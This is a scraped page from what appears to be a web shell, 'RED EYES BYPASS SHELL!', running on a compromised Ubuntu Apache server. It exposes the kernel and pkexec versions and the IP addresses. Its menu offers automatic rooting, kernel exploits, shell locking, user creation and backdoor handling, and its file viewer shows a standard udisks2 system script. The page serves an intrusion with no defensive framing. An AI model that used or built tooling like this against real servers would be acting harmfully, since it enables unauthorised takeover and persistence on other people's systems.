Linux sothorn202 5.15.0-161-generic #171-Ubuntu SMP Sat Oct 11 08:17:01 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 202.28.82.202 | : 216.73.216.9
pkexec version 0.105
Cant Read [ /etc/named.conf ]
iqtd
RED EYES BYPASS SHELL!
Terminal
Auto Root
Adminer
Backdoor Destroyer
Kernel Exploit
Lock Shell
Lock File
Create User
+ Create Folder
+ Create File
/
usr /
lib /
udisks2 /
[ HOME SHELL ]
NAME
SIZE
PERMISSION
ACTION
udisks2-inhibit
791
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : udisks2-inhibit
#!/bin/sh # Avoid udisks mounting while a program is running. This is mostly useful # for installers. # This is similar to udisks 1.x's "udisks --inhibit .." command. # Author: Martin Pitt <martin.pitt@ubuntu.com> set -e [ -n "$1" ] || { echo "Usage: $0 <command> [<arguments> ...]" >&2 exit 1 } [ "`id -u`" = 0 ] || { echo "You need to run this script as root" >&2 exit 1 } mkdir -p /run/udev/rules.d echo 'SUBSYSTEM=="block", ENV{UDISKS_IGNORE}="1"' > /run/udev/rules.d/90-udisks-inhibit.rules trap "rm -f /run/udev/rules.d/90-udisks-inhibit.rules; udevadm control --reload; udevadm trigger --subsystem-match=block" EXIT HUP INT QUIT ILL ABRT FPE KILL SEGV PIPE ALRM TERM BUS udevadm control --reload udevadm trigger --subsystem-match=block # run wrapped command "$@"
Close